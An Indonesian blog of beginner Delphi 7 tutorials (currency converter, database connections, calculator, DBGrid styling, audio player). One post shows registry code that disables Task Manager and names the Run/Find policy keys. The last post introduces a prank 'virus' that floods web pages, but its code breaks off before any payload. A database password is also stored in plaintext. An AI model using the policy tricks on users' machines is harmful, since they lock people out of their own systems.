Pertama-tama wajib mendownload delphi 7, cari aja di mbah google pasti ada banyak banget. Setelah download selesai, install di kompi atau laptop anda, kalau dah punya delphi 7 gak diwajibkan untuk download, siapkan aja ember,gayung dan air, cari dikamar mandi jangan di mbah google.. xixixxi
bingung ya kok pake ember,gayung dan air???? yaiaylah orang aku boongin,,, ckckckck
udah deh bercandanya sekarang serius....

Langkah pembuatan program :

1. Jalankan Delphi 7

2. Pada kotak objek inspector terdapat 2 baris dan banyak kolom. pada kolom color isi dengan warna kesukaan anda. Disini saya contohkan dengan warna "clAqua"

3. Pada kolom caption "Form1" ganti dengan "konversi uang"

4. Tambahkan label,edit,dan button pada form konversi uang, dengan mengeklik simbol "A","OK","AB|" pada bagian atas lalu klik kan ke form konversi uang.

6. Untuk mengganti nama pada label, klik sekali saja label yang ingin diganti namanya, lalu lihat kotak kiri bawah (kotak objek inspector) ganti nama yang anda inginkan pada kolom caption, yang sebelumnya bernama label1. Dan lakukan cara yang sama untuk mengganti nama pada tombol/button.

7. langkah selanjutnya memasukkan listning program pada button "konversi". dengan cara klik dua kali tombol tersebut lalu masukkan listning program di bawah ini:

procedure TForm1.BitBtn1Click(Sender: TObject);
var
masukkan,seratus_ribu,lima_puluh_ribu,sepuluh_puluh_ribu,
lima_ribu,seribu,lima_ratus,seratus,lima_puluh,sepuluh,satu:integer;
begin
{100 ribu}
masukkan:=StrToInt(edit1.Text);
seratus_ribu:=masukkan div 100000;
edit2.Text:=IntToStr(seratus_ribu);
{50 ribu}
masukkan:=StrToInt(edit1.Text);
lima_puluh_ribu:=masukkan div 50000 mod 2;
edit3.Text:=inttostr(lima_puluh_ribu);
{10 ribu}
masukkan:=StrToInt(edit1.Text);
sepuluh_puluh_ribu:=masukkan div 10000 mod 5;
edit4.Text:=inttostr(sepuluh_puluh_ribu);
{5 ribu}
masukkan:=StrToInt(edit1.Text);
Lima_ribu:=masukkan div 5000 mod 2;
edit5.Text:=inttostr(lima_ribu);
{seribu}
masukkan:=StrToInt(edit1.Text);
seribu:=masukkan div 1000 mod 5;
edit6.Text:=inttostr(seribu);
{lima ratus}
masukkan:=StrToInt(edit1.Text);
lima_ratus:=masukkan div 500 mod 2;
edit7.Text:=inttostr(lima_ratus);
{seratus}
masukkan:=StrToInt(edit1.Text);
seratus:=masukkan div 100 mod 5;
edit8.Text:=inttostr(seratus);
{lima puluh}
masukkan:=StrToInt(edit1.Text);
lima_puluh:=masukkan div 50 mod 2;
Edit9.Text:=IntToStr(lima_puluh);
{sepuluh}
masukkan:=StrToInt(edit1.Text);
sepuluh:=masukkan div 10 mod 5;
Edit10.Text:=IntToStr(sepuluh);
{satu}
masukkan:=StrToInt(edit1.Text);
satu:=masukkan div 1 mod 10;
Edit11.Text:=IntToStr(satu);
end;

8. Terus klik dua kali lagi pada button "Exit" dan copas listning program dibawah ini :

procedure TForm1.BitBtn2Click(Sender: TObject);
begin
if Application.MessageBox('Anda Yakin?',
'informasi',mb_okcancel or mb_iconquestion)=mrok then
Application.Terminate;
end;
end.

9. Untuk Menjalankannya klik tombol run , lalu masukkan uang yang ingin anda konversikan, terus klik tombol konversi, lihat apa yang terjadi!! Program akan menampilkan jumlah masing- masing pecahan, jika seluruh pecahan itu di jumlahkan maka hasilnya sama dengan nilai uang yang anda masukkan tadi.




Nah,,, kurang lebihnya seperti itu, Selamat Mencoba. ^_^
Diposkan oleh Borland7
Berikut ini adalah cara mengkoneksikan database MySQL dengan IDE Delphi :

1. Salinlah DBEXPMYS.DLL yang terdapat pada C:\Program Files\Borland\Delphi7\Bin ke C:\Windows\system

2. Di Direktori C:\Borland Shared\DBExpress terdapat berkas bernama dbxdriver.txt, dengan menggunakan text editor, misalkan Notepad, ubahlah teks berikut:[MySQL]
GetDriverFunc = getSQLDriverMYSQL
LibraryName=dbexpmysql.dll

menjadi

[MySQL]
GetDriverFunc = getSQLDriverMYSQL
LibraryName=dbexpmys.dll
3. Downloadlah file libmysql.dll dari situs http://www.dll-files.com/dllindex/dll-files.shtml?libmysql

4. Salinlah file libmysql.dll tersebut ke dalam C:\windows\System

5. Untuk mengkoneksikan antara program yang kita buat dalam Delphi dengan MySQL kita dapat menggunakan komponen SQLConnection yang terdapat dalam dbExpress

Semoga bermanfaat :D
Diposkan oleh Borland7
Untuk menginstal Komponen QuickReport pada delphi 7, caranya kaya gini neh?
- Buka Delphi7 Anda
- Masuk menu component dan pilih install packages
- Tambahkan komponen baru dengan memilih add
- Setelah itu cari fiel dclqrt70.bpl
- Kemudian OK
- Komponen QuickReport sudah terinstal dalam delphi7

catatan :
file dclqrt70.bpl ada di folder bin delphi7 OK

semoga bermanfaat ...
Diposkan oleh Borland7
Untuk menampilkan tanggal atau waktu atau keduanya di delphi secara real time
anda bisa menggunakan Komponen Timer pada event OnTimer.
berikut ini tutorial singkatnya (saya menggunakan delphi 7) :

* Buat sebuah project baru di delphi. tambahkan sebuah komponen Label dan
sebuah komponen Timer (ada di tab System)
* Set property Interval komponen Timer
menjadi 100 atau berapa saja (satuan dalam milli second) lebih kecil interval yang diberikan,
lebih cepat event OnTimer dieksekusi
* Tambahkan perintah berikut pada Event OnTimer komponen Timer

//

label1.Caption :=
formatdatetime(‘"Tanggal : "dd/mm/yyyy’,now)+chr(10)+
formatdatetime(‘"Pukul : "hh:nn:ss’,now);
label1.Refresh;

//
Diposkan oleh Borland7
Database adalah merupakan kumpulan data yang saling berhubungan yang diorganisasi sedemikian rupa agar kelak dapat dimanfaatkan kembali dengan cepat dan mudah. Dalam hal pemrograman database sudah menjadi bagian yang sangat penting dalam menyimpan data. Bermacam-macam cara yang dapat dilakukan agar database dapat ditampilkan didalam pemrograman. Salah satunya menggunakan DBGrid, Listview, ataupun komponen lainnya. Saya akan berbagi bagaimana menampilkan teks dari database yang ditampilkan ke Listview. Saya pilih listview karena mungkin DBGrid sudah umum banyak dipakai dan menurut saya tampilannya kurang begitu bagus.

Ada dua cara untuk menampilkan data di listview :

1. Melalui properties di komponennya (klik kanan listview, pilih “column editor” atau “item editor”)

2. Menggunakan code program.

Saya akan menjelaskan untuk no.2.

Berikut code programnya :


procedure TForm1.Button1Click(Sender: TObject);
var
KolomBaru:TListColumn;
ItemBaru:TListItem;
begin
ListView1.ViewStyle := vsReport;
ListView1.Columns.Add;
ListView1.Columns[0].Caption:='No';
ListView1.Columns.Add;
ListView1.Columns[1].Caption:='Judul Buku';
ListView1.Columns.Add;
ListView1.Columns[2].Caption:='Komentar';
ItemBaru:=ListView1.Items.Add;
ItemBaru.Caption:='1';
ItemBaru.SubItems.Add('Belajar Delphi');
ItemBaru.SubItems.Add('Terus coba ya');
end;

procedure TForm1.Button2Click(Sender: TObject);
var
jmlkolom,i:integer;
begin
for i := ListView1.Items.Count - 1 downto 0 do
ListView1.Items.Delete(i);
for i := ListView1.Columns.Count - 1 downto 0 do
ListView1.Columns[i].Destroy;
end;

Prosedur pertama digunakan untuk tombol membuat data dan kolom, dan prosedur yang ke dua digunakan untuk tombol hapus data.

Nah untuk menampilkan data dari database yang ditampilkan di ListView nantikan artikel selanjutnya.
Diposkan oleh Borland7
Buat para pembaca yang tertarik pengen belajar pemrograman delphi,khususnya bagi para pemula...hahahhaa..kayak dah hebat aja..padahal ilmunya aja masih seujung jarum...tapi nggak salahkan saling berbagi pengetahuan..siapa tahu ada pembaca yang lagi membutuhkan..pada postingan kali ini saya akan menuliskan sedikit tentang bagaimana cara membuat kalkulator sederhana dengan menggunakan aplikasi delphi..versi yang saya gunakan disini masih sama seperti postingan saya sebelumnya

yaitu dengan menggunakan delphi versi 7..karna saya juga belajarnya pakai versi 7,makanya saya juga buat programnya pakai versi 7..berikut adalah contoh Tampilan program kalkulator sederhana pada saat di running..



Buat para pembaca yang berminat pebngen nyobain buat kalkulator seperti gambar diatas,berikut langkah-langkahnya :
1. Buat Form baru terlebih dahulu,kemudian letakkan 1 buah Panel yang berada
pada tab standard

2. Seletah itu,pada tab properties hilangkan caption panel tersebut, dan
kemudian pada warna panel pilih “clGradientInactiveCaption”.

3. Kemudian masih pada tab standard letakkan 6 buah button,4 buah data edit dan
4 buah label.

4. Setelah itu atur letak kesemuanya seperti terlihat pada gambar diatas
Nah sekarang pembaca tinggal meletakkan sedikit coding pada masing masing button tersebut.

1. Klik 2x pada button “ + “,kemudian paste kode berikut :

b1:integer;
b2:integer;
jml:integer;
begin
b1:=StrToInt(Eb1.Text);
b2:=StrToInt(Eb2.Text);
jml:=b1+b2; ///operasi penambahan
Ejml.text:=FloatToStr(jml);
End;
2. Pada button “ –“ klik 2x dan paste code berikut :

b1:integer;
b2:integer;
jml:integer;
begin
b1:=StrToInt(Eb1.Text);
b2:=StrToInt(Eb2.Text);
jml:=b1-b2; //operasi pengurangan
Ejml.text:=FloatToStr(jml);
end;

3. Klik 2 x pada button “ / “, kemudian paste code berikut :

b1:integer;
b2:integer;
jml:integer;
begin
b1:=StrToInt(Eb1.Text);
b2:=StrToInt(Eb2.Text);
jml:=b1 div b2;
Ejml.text:=FloatToStr(jml);
end;
4. Pada operasi perkalian,paste code berikut :

b1:integer;
b2:integer;
jml:integer;
begin
b1:=StrToInt(Eb1.Text);
b2:=StrToInt(Eb2.Text);
jml:=b1*b2;
Ejml.text:=FloatToStr(jml);
end;
5. Untuk button “ulang” paste lagi code berikut :
begin
Eb1.Text:='0';
Eb2.Text:='0';
Ejml.Text:='0';
end;
6. Sedangkan untuk button “KELUAR” anda hanya tinggal menambahkan code berikut
“ close ; “ tanpa tanda kutip.
7. Nah selesai sudah...sekarang coba anda running program yang sudah anda buat
tadi..mudahan berhasil..hehehheee

Semoga bermanfaat
Diposkan oleh Borland7
Uses Registry
Menyimpan Settingan Database
procedure TForm1.BBSimpanClick(Sender: TObject);
begin
try
// Membuat key baru
Reg.OpenKey(‘\Softwareku’, true);
// Menulis data string (Caption form) ke registry
Reg.WriteString(‘Host’, EHost.Text);
Reg.WriteString(‘Port’, EPortname.Text);
Reg.WriteString(‘User’, Euser.Text);
Reg.WriteString(‘Pass’, Epass.Text);
Reg.WriteString(‘Database’, EDBname.Text);
finally
Reg.CloseKey;
end;

end;

//ONCREATE FORM
procedure TForm1.FormCreate(Sender: TObject);
begin
Reg := Tregistry.Create;
Reg.RootKey := HKEY_CURRENT_USER;
end;

Memanggil Settingan database
try
try
Reg.OpenKey(‘\Softwareku’, false);
Edit1.Text := Reg.ReadString(‘Host’);
ComboBox1.Text := Reg.ReadString(‘Port’);
Edit2.Text := Reg.ReadString(‘User’);
Edit3.Text :=Reg.ReadString(‘Pass’);
Edit4.Text := Reg.ReadString(‘Database’);
except on ERegistryException do
ShowMessage(‘Gagal membaca settingan…’);
end;
finally
Reg.CloseKey;
End;
Diposkan oleh Borland7
Untuk membuat kotak pencarian yang real time pada Delphi kayak di ajax gitu, misalnya untuk menampilkan data barang ketika user mengetikkan kode stok barang, dan barang akan otomatis ditampilkan saat itu juga secara real time, anda bisa melakukannya dengan menggunakan filtering.

Gambar Form Pencarian

Ini adalah contoh source code untuk melakukan pencarian data barang dengan keyword kode stok barang:

procedure TForm1.ComboKodeStockChange(Sender: TObject);

begin

//cari

with ZTable1 do

if (ComboKodeStock.Text <> ”) then

begin

Filtered:= false;

Filter:= ‘Kodest like’ + QuotedStr(ComboKodeStock.Text+’*');

Filtered:= true;

//tampilkan di dbgrid

DataSource1.Enabled:=true;

end;

end;

Cara membuat procedure ” TForm1.ComboKodeStockChange” yaitu klik pada combobox, kemudian di jendela property pilih event, onChanges.

Components yang saya gunakan antara lain TZTable, TDatasource, TDbGrid, dan TZConnection.
Diposkan oleh Borland7
Sesuai judul diatas saya ingin menambahkan program kode generate untuk delphi. Sebenernya pada posting sebelumnya sudah ada, namun hanya no urut berdasarkan jumlah record dan diawali dengan sebuah karakter. Untuk Generate Code bag 2 ini hanya saja ditambahkan digit untuk tanggal, bulan dan tahun, baru kemudian no urut data. Untuk lebih jelas liat kode program berikut:


procedure TForm1.GenerateClick(Sender: TObject);
var kd,st,newKd,tgl,bln,thn,tglx,potKd:string;
i,n:integer;
begin
tgl:=datetostr(date);
tgl :='';
bln :='';
thn :='';
//Set Format tanggal
ShortDateFormat:='dd/MM/yy';

tgl:=copy(datetostr(date),1,2);
bln:=copy(datetostr(date),4,2);
thn:=copy(datetostr(date),7,2);

tglx := tgl + bln + thn;

ATable1.Last;
//Mengecek bila tabel belum pny satu pun record
if not(ATable1.eof and ATable1.Bof) then
begin
kd:=ATable1.FieldByName('No').AsString;
potKd:=copy(kd,1,6);

//Ngecek jika input baru yg dimasukan merupakan tahun ajaran baru berikutnya
if (tglx = potKd) then
begin
for i:=7 to 9 do
st:=st+kd[i];
n:=strtoint(st)+1;
case length(inttostr(n)) of
1 : newKd:=tglx + '00'+inttostr(n);
2 : newKd:=tglx + '0'+inttostr(n);
3 : newKd:=tglx + ''+inttostr(n);
end;
end
else newKd:=tglx + '001';
self.Edit1.Text:=newKd;
end
else newKd:=tglx + '001';
self.Edit1.Text:=newKd;
ATable1.Append;
end;

Perintah copy merupakan fungsi yang digunakan untuk mengambil nilai pada bagian string tertentu/substring. Didalam fungsi copy terdapat 3 parameter (string yang diambil, posisi awal, jumlah yang diambil). Nah, untuk tahun ajaran berikutnya kode yang dihasilkan berupa 2 digit tanggal, 2 digit bulan, 2 digit tahun dan 3 digit no urut yang dimulai no urut pertama lagi.

Hasil dari generate diatas seperti berikut : 130409001, 130409002, 130409003 dst….

Potongan prosedur diatas sudah siap digunakan dan Anda hanya tinggal membuat prosedur untuk menyimpan kode yang dihasilkan ke database.
Diposkan oleh Borland7
Ketika membuat program seringkali kita membuat no urut yang dibuat dari bawaan database, seperti kode yang bertipe integer dan yang bersifat increment. Cara tersebut memberikan keuntungan yaitu mudah dan cepat, namun saya seringkali mendapat masalah saat menghapus record/data paling terakhir, yaitu no urut akan terus bertambah seiring banyak data yang pernah ada. Misal seperti ini, ada 10 data mulai no urut 1-10. Bila data ke-9 dan ke-10 saya hapus, berarti tinggal 8 data kan, kemudian saya menambahkan 1 data ke database, timbulah permasalah yaitu no urut yang dihasilkan bukanlah no-9 melainkan no 11. Itu terjadi karena database masih menyimpan no urut yang pernah di hapus. Untuk mengatasi hal ini akhirnya saya menggunakan code seperti ini, walaupun masih memiliki kelemahan, tetapi untuk kasus seperti yang saya ceritakan bisa diatasi. Berikut source code nya :


var kd,st,newKd:string;
i,n:integer;
....
ADOTable1.Last;
if not(ADOTable1.eof and ADOTable1.Bof) then
begin
kd:=ADOTable1.FieldByName('kode').AsString;
// auto generate
for i:=1 to 2 do
st:=st+kd[i+1];
n:=strtoint(st)+1;
case length(inttostr(n)) of
1 : newKd:='K0'+inttostr(n);
2 : newKd:='K'+inttostr(n);
end;
end
else newKd:='K01';
Edit1.Text:=newKd;

nb: Untuk field kode bertipe varchar/text dengan length 3.
Hasil akhir akan menghasilkan kode yang berurut yang mulai diawali dengan huruf :
K01
K02
K03

K99

Silahkan dimodifikasi dan selamat mencoba…
Diposkan oleh Borland7
Label: Borlan Delphi
Komponen DBGrid, tentunya teman - teman tidak asing lgi dengan komonen ini. Komponen ini fungsinya untuk menampilkan isi database dari data yang kita input. Normal dari warna tampilan cell (baris) DBGrid adalah putih.
Namun jika tampilan pada DBGrid semuanya sama dan kebetulan banyak cell pada DBGrid tentunya kita akan mudah bosan jika lama - lama memandang ke Tabel tersebut (DBGgrid), Untuk itu agar para user tidak bosan terhadap tampilan tabel tersebut, kita bisa membuat tampilan DBGrid (Tabel) menajadi Kombinasi Warna Sehingga user akan lebih mudah mengecek dari tabel tersebut.
Caranya adalah sebagai berikut :

1.Tentunya sebelum melakukan Hal ini, teman - teman sudah menambahkan Komponen DBGrid diform dan komponen koneksi database, sehingga ketika diaktifkan maka data di dalam database akan tampil di DBGrid (Hal ini tidak dijelaskan lagi, sebab tentunya teman - teman sudah mengetahuinya langkah - langkahnya)
2.
Klik Komponen DBGrid kemudian pada Object Inspector Pilih Events trus pilih event DrawColumnCell klik 2 X (dua kali)
3. Kemudian teman - teman masukan kode berikut ini :
procedure TForm1.DBGrid1DrawColumnCell(Sender: TObject; const Rect: TRect;
DataCol: Integer; Column: TColumn; State: TGridDrawState);
begin
if DBGrid1.DataSource.DataSet.RecNo mod 2 =0 then
DBGrid1.Canvas.Brush.Color := clskyBlue; //pilih warnanya
DBGrid1.DefaultDrawColumnCell(rect, datacol, column, state);
end;
4. Kalau sudah selesai coba teman - teman compile aplikasi teman - teman dengan menekan tombol F9 di keyboard.


Catatan :
Sesuain nama komponen DBGrid dengan nama DBGrid yang teman - teman gunakan. kalau didalam contoh ini saya tidak merubah nama dari komponen DBGrind sehingga namanya tetap DBGrid1.
Ok itu saja dulu,,, kalau ada yang salah saya mohon maaf karena saya juga masih dalam pembelajaran. Semoga Bermanfaat ya... !!!
Diposkan oleh Borland7
Sesuai janji saya pada artikel sebelumnya (Membuat file konfigurasi .ini dengan delphi) yaitu membuat file registry dengan delphi, ya kali ini saya coba menepati janji. Registry, dalam platform sistem operasi Microsoft Windows 32-bit, merupakan sebuah basis data yang disusun secara hierarkis yang mengandung informasi mengenai konfigurasi sebuah sistem, mulai dari konfigurasi perangkat keras, perangkat lunak, asosiasi ekstensi berkas dengan aplikasinya hingga preferensi pengguna. Registry merupakan pengganti berkas-berkas konfigurasi *.INI yang digunakan dalam sistem Windows 16-bit (Windows 3.x dan Windows for Workgroups). Registry, pertama kali diperkenalkan di dalam sistem Windows 16-bit sebagai penampung informasi mengenai pemetaan/asosiasi ekstensi berkas dengan aplikasinya, dan kemudian dikembangkan menjadi basis data dengan cakupan yang luas pada sistem-sistem operasi keluarga Windows NT. Registry juga kemudian digunakan pada sistem operasi kelas rumahan: Windows 95, Windows 98 dan Windows ME, tapi memang implementasi yang cukup bagus dari registry terdapat di dalam keluarga sistem operasi Windows NT. Nah bagaimana cara membuat atau merubah registry? Mudah saja bila Anda menggunakan fasilitas regedit, Anda tinggal masuk atau menjalankan melalui RUN->ketik “regedit” lalu tekan enter, maka munculah halaman registry.

Tetapi bagaimana bila ingin merubah registry menggunakan program delphi? Lihat contoh di bawah ini. Pada awal program tambahkan klausa registry pada bagian uses.
kodenya sbb:



procedure TForm1.Button1Click(Sender: TObject);
var
reg:Tregistry;
begin
reg:=TRegistry.Create;
Try
reg.RootKey:=HKEY_CURRENT_USER;
reg.OpenKey('\SOFTWARE\ProgramAnda\',true);
reg.WriteInteger('Status',1);
reg.WriteString('Nilai','tes');
reg.CloseKey;
finally
reg.free;
end;
end;

Hasil program di atas akan membuat variabel registry bertipe integer dan string yang disimpan di “HKEY_CURRENT_USER\SOFTWARE\ProgramAnda\”. Coba Anda jalankan programnya, dan lihat hasil registrynya melalui halaman regedit yang sudah saya jelaskan tadi di atas.

Anda bisa merubah lokasi root atau lokasinya sesuai yang diinginkan, bahkan banyak pembuat program yang bersifat trial menyimpan variabel-variabel yang rahasia di registry. Bila Anda mau Anda bisa membuat aplikasi seperti patch program melalui registry dengan delphi atau menghilangkan sebagian fungsi dari operasi sistem, seperti fungsi run, find, task manager dll. Berikut kodenya seperti berikut :

?View Code DELPHI



procedure TForm1.Button1Click(Sender: TObject);
var
reg:TRegistry;
begin
reg:=TRegistry.Create;
try
if CheckBox1.Checked then
begin
reg.RootKey:=HKEY_CURRENT_USER;
reg.OpenKey('\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',true);

//Nilai 1 = enable, 2 disable
reg.WriteInteger('DisableTaskMgr',1);
reg.CloseKey;
end

else
begin
reg.RootKey:=HKEY_CURRENT_USER;
reg.OpenKey('\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',true);

//Nilai 1 = enable, 2 disable
reg.WriteInteger('DisableTaskMgr',0);
reg.CloseKey;
end;
finally
reg.Free;
end;
end;

Program ini belum sepenuhnya sesuai dengan tampilan, untuk fungsi run dan find belum bisa dijalankan, karena code nya belum saya masukan. Tapi Anda bisa mencobanya dengan lokasi registry seperti berikut : Untuk fungsi RUN HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Dengan variabel NoRun Untuk fungsi FIND HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Dengan variabel NoFind Nilai default adalah 0 ( 0 = enable, 1 = disable) Sebagian perubahan nilai registry tidak berpengaruh sampai Anda melakukan restart komputer. Program di atas bisa Anda download melalui link di bawan ini.
Diposkan oleh Borland7
Awal ceritanya seh aku lagi nyari tugas membuat data base dengan delphi di mbah google,tepatnya seh setahun yang lalu dan tidak sengaja dapet tutorial buat Audio player dari mas "NurWahyu H". dan secara tidak sengaja juga, aku baca artikelnya.(baca artikel kok gak sengaja??????????) dari situlah aku mulai tertarik, dan langsung aku praktekkin (gak jadi ngerjain tugas tapi malah main-main,,, wkwkwkwkwk). Jika anda tertarik juga silahkan baca tutorial dibawah ini, atau download program yang sudah saya praktekin disini .

langkah-langkahnya sebagai berikut :

1. Jalankan Borland Delphi. Kemudian klik File | New | VCL Form
Application.

2. Klik tab Properties pada Object Inspetor. Ubah Caption “Form1” menjadi
Wahyu Audio Player”. Lalu pindah ke tab Events, kilk ganda pada Event
OnCreate sehingga tampil Code Editor dan ketikkan kode:

procedure TForm1.FormCreate(Sender: TObject);
var
busur:HRGN;
oke:HBRUSH;
setengah:HDC;
begin

busur:=createellipticrgn(5,25,495,590);
setwindowrgn(handle,busur,true);
deleteobject(busur);
end;


3. Tambahkan komponen TImage1 yang tedapat pada Component Pallete ke
dalam Form Designer. Tambahkan gambar pemandangan dengan
mengklik ganda property Picture. Ubah property Stretch menjadi true dan
visible menjadi true. Klik tab Events, lalu klik ganda pada OnMouseDown
dan tuliskan kode program:

procedure TForm1.Image1MouseDown(Sender: TObject; Button: TMouseButton;
Shift: TShiftState; X, Y: Integer);
const
sc_dragmove=$F012;
begin
releasecapture;
form1.Perform(wm_syscommand,sc_dragmove,0);
end;


4. Tambahkan 2 buah TButton. Ubah property Captionnya menjadi “Buka”
dan “Tutup”. Klik ganda tombol “Buka”, tuliskan kode:

procedure TForm1.Button1Click(Sender: TObject);
begin
if opendialog1.Execute then
begin
mediaplayer1.filename:=opendialog1.filename;
mediaplayer1.open;
mediaplayer1.play;
mediaplayer1.stop;
end
end;


Klik ganda tombol “Berhenti” lalu tuliskan kode:

procedure TForm1.Button2Click(Sender: TObject);
begin
mediaplayer1.Close;
end;


5. Tambahkan 1 buah TSpeedButton, ubah property Caption menjadi “-“ dan
1 buah TPanel ubah menjadi “Keluar”. Klik ganda “Keluar”, tulis kode:

procedure TForm1.BitBtn3Click(Sender: TObject);
begin
if Application.MessageBox('Terimakasih Telah Menggunakan Software ini',
'informasi',mb_okcancel or mb_iconquestion)=mrok then
Application.Terminate;
end;


6. Tambahkan 2 buah Tlabel. Caption “Label 1” dikosongkan dan “Label 2”
ubah menjadi “Fauyan Audio Player”

7. Tambahkan 2 buah komponen TTimer.Atur property timer 1 dengan
interval 700 dan timer 2 dengan interval 1000. Pada tab Events, klik ganda
OnTimer lalu tuliskan kode program pada timer 1:

procedure TForm1.Timer1Timer(Sender: TObject);
begin
if label2.visible = true then
label2.visible := false
else
label2.visible := true;
end;


Dan tuliskan kode untuk timer 2:

procedure TForm1.Timer2Timer(Sender: TObject);
begin
label1.Caption:=timetostr(time);
end;


8. Letakkkan komponen TOpenDialog lalu atur property Filter ketikkan type
*.mp3, *.wav dan *.avi. pada form.

9. Klik komponen TMediaPlayer yang ada di Commponen pallete untuk
ditambahkan pada Form.

10. Untuk membuat pesan teks cursor berada di atas tombol, tuliskan pesan teks pada property hint dan atur property showhint menjadi true.

11. Atur property cursors untuk memberikan efek pada bentuk cursor.


12. Jalankan Program yang telah dibuat dengan menekan run. Apabila program yang ditulis benar, maka akan menghasilkan tampilan program seperti yang terlihat di bawah:

13. Agar program di atas bisa dijalankan tanpa harus membuka Borland Delphi, maka program WAPlayer yang telah dibuat harus diubah ekstensinya menjadi .exe dengan cara klik Menu Project kemudian klik Compile.
Diposkan oleh Borland7
ZEOSDBO-6.6.3-stable merupakan versi terbaru dari Zeos yang berfungsi mengkoneksikan Delphi – dengan database. Yang mau dibahas disini adalah koneksi dengan MYSQL,.

1. Extract ZEOSDBO-6.6.3-stable.rar yang bisa anda Download di Sini

2. Buka Delphi 7 anda.

3. Pilih File – Open, kemudian Cari dimana Folder tempat dimana anda menaruh extract tadi.

4. Masuk ke folder ZEOSDBO-6.6.3-stable à packages à delphi7

5. Block File-file berikut :
ZComponent.dpk, ZComponentDesign.dpk, ZCore.dpk, ZDbc.dpk, ZParseSql.dpk, ZPlain.dpk kemudian Open

6. Urutkan jendela2 component tersebut sesuai urutan berikut
• ZCore.bpl
• ZParseSql.bpl
• ZPlain.bpl
• ZDbc.bpl
• ZComponent.bpl

7. Compile component tersebut satu persatu dengan menekan Compile
Jika tidak ada respon itu tidak apa2, lakukan ke semua jendela sesuai urutan di atas. Kemudian tutup jendelanya itu.

8. Yang terakhir adalah ZComponentDesign.dpk, tekan Compile lalu tekan Install, maka akan keluar pesan berikut(jika sukses)

9. Kemudian tutup jendela ini juga, pilih Yes jika ada pertanyaan.

10. Untuk melihat apakah component berhasil di install lihat pada Tab komponen Delphi paling terakhir yaitu “Zeos Acces”

11. Selanjutnya yang paling penting adalah menentukan patch pada Delphi agar saat penggunaannya tidak error, patch tidak ditemukan.
Caranya yaitu : (pada delphi)
- Cari tools à Environment Options à Pilih Tab Library

- Kemudian Pilih library path (tombol yang ada titik2 sebelah kanan)
- Klik tombol titik seperti pada gambar

Kemudian cari tempat anda menaruh component Zeos Tersebut
Masuk ke Folde src, kemudian pilih salah satu nya terlebih dahulu, yaitu “component” kemudian OK, dan klik Add.
Lakukan pada ke lima folder tersebut (seperti urutan di atas). Ok.

SELESAI dah……
Selamat Mencoba…
Diposkan oleh Borland7
bosan dengan tampilan form delphi anda....
sekarang anda dapat membuat tampilan form delphi anda sedikit lebih menarik...
disini kita akan membuat gradien warna...langsung aja yah

silahkan buka new project delphi anda....lalu isikan code dibawah ini
procedure TForm1.FormPaint(Sender: TObject);
var
Row, Ht: Word;
IX: Integer;
begin
iX :=200 ;
Ht:=(ClientHeight + 512) div 256;
for Row := 0 to 512 do
begin
with Canvas do begin
Brush.Color := RGB(Ix,150,row);
FillRect(Rect(0, Row * Ht, ClientWidth, (Row + 1) * Ht));
IX :=(IX-1);
end;
end;
end;


end.

jalankan delphi anda....dan lihat hasilnya....
Diposkan oleh Borland7
CARA MENGINSTAL KOMPONEN BARU PADA DELPHI

SEKARANG SAYA AKAN memberikan LANGKAH atau cara menginstall komponen baru pada Delphi Sebelumnya download terlebih dahulu KOMPONE DELPHI YANG ANDA INGINKAN DISINI BOZZ,TINGGAL DISEDOT SATZA,,,,...LANJUT,... Adapun caranya adalah sebagai berikut:

1. Setelah Anda mendownload dan mengekstrak file COMPONEN YANG ANDA INGINKAN tersebut, maka Anda akan memperoleh empat buah file. Copy keempat file tersebut ke direktory Lib (biasanya C:\Program Files\Borland\Delphi 3\Lib).

2. Jalankan program Delphi Anda. Dari menu Component, pilih Install Component.

3. Pada bagian Unit File Name, klik Browse dan arahkan ke letak file nama file.pas (C:\Program Files\Borland\Delphi 3\Lib\file.pas(TERGANTUNG NAMA);.

4. Untuk bagian Package File Name, Anda bisa mengisi dengan C:\Program Files\Borland\Delphi 3\Lib\file.dpk(TERGANTUNG NAMA);

5. Klik OK.

6. Jika penginstallan komponen berhasil maka akan nampak komponen baru(CARI DI tab MENU delphi);

CARA KE 2


1. Tutup dulu IDE Delphi yang sudah ada, untuk menghindari kebingungan.

2. Extract file komponen yang udah di download ke dalam satu folder tersendiri, misal: D:\Components\namakomponen

3. Jalankan IDE Delphi 6 anda, Klik *File->New->Others* pada Menubar IDE delphi.

4. Pada dialog “New items” yang muncul, klik tab “New” dan cari icon “Package” pada list items type yang ada pada list view di bawahnya, double click icon tersebut, IDE delphi akan membuatkan ada satu package project baru.

5. Melalui MenuBar IDE Delphi, klik *File->Save*, pada dialog save package, navigasikan Folder aktif yang terdapat di field “Save in” agar menunjuk ke D:\Components\namakomponen

6. Sesuaikan nama file package1.dpk menjadi namakomponen.dpk, klik tombol “Save“.

7. Klik button “Options” pada window “Package – GhostMemoD6.dpk“, klik tab “description“, ketik “SEMBARANG NAMA” pada field deskripsi yang ada.

8. Pada opsi “Usage options” pilih salah satu dari “Designtime only” atau “Designtime and runtime“, saran, biarkan opsi default: “Designtime and runtime“.

9. Masih di dialog project options, klik tab “Directories“. masukkan: “.\ ” pada field output directory, unit directory, dan DCP output directory.

10. Klik OK, dialog project options akan ditutup.

11. Pada window package, klik-kanan pada node “Contains” pada tree-view window, pilih “Add…” pada pop-up menu yang muncul. sebuah dialog “Add” akan ditampilkan.

12. Klik Tab “Add Unit“, klik tombol “Browse…“.

13. Pada dialog Open File yang muncul, pilih file “namakomponen.pas“, dan klik tombol “Open“.

14. Klik OK.

15. Perhatikan di tree-view Contains akan bertambah 2 file, namakomponen.pas dan namakomponen.dcr.

16. Pada window package anda, klik “Install“, sebuah dialog bahwa komponen tersebut telah terinstall akan muncul.

17. Save package project tersebut melalui *File->Save*

18. Tutup semua project yang ada melalu *File->Close All*

19. Komponen yang terinstall akan muncul pada sebagai pallete PADA TAB BARU atau di tab yang sesuai dengan komponen tersebut pada component pallete IDE delphi.

SEKIAN DARI SAYA.
Diposkan oleh Borland7
ATTENTION FIRST::
Ini virus jenis flooding dengan membuka halaman web secara terus menerus sampe menuhin cache momory + usil dengan buka tutup door dari cd/dvd-room kamu

Kodenya sbb:

unit Unit1;

interface
{Deklarasiin library ShellAPI,Registry yang dipakai dimasukkan di USES ini}
{GUNANYA BIAR KITA BISA NGOTAK-ATIK REGISTRY}
uses
